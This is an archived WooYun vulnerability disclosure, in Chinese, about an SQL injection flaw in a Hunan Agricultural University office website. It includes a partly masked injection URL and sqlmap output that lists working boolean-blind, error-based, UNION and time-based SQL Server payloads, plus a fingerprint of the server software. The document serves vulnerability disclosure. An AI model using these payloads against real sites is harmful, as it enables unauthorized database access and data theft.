乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-29: 细节已通知厂商并且等待厂商处理中 2016-01-04: 厂商已经确认,细节仅向厂商公开 2016-01-14: 细节向核心白帽子及相关领域专家公开 2016-01-24: 细节向普通白帽子公开 2016-02-03: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
湖南农大科技处爆注入漏洞
注入点:http://**.**.**.**/kjc_notice/main_readnotice.asp?id=8a8889a0504ad14d01516bab606c584e
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ysqlmap identified the following injection points with a total of 59 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=8a8889a0504ad14d01516bab606c584e' AND 1517=1517 AND 'wyQq'='wyQq Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=8a8889a0504ad14d01516bab606c584e' AND 8651=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8651=8651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113))) AND 'aExn'='aExn Type: UNION query Title: Generic UNION query (NULL) - 16 columns Payload: id=-1600' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(120)+CHAR(113)+CHAR(103)+CHAR(76)+CHAR(103)+CHAR(81)+CHAR(65)+CHAR(107)+CHAR(68)+CHAR(118)+CHAR(80)+CHAR(88)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: id=-5928' OR 4638=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zhXY'='zhXY---[15:20:04] [INFO] testing Microsoft SQL Server[15:20:15] [INFO] confirming Microsoft SQL Server[15:20:56] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005
危害等级:中
漏洞Rank:6
确认时间:2016-01-04 14:33
通知处理中
暂无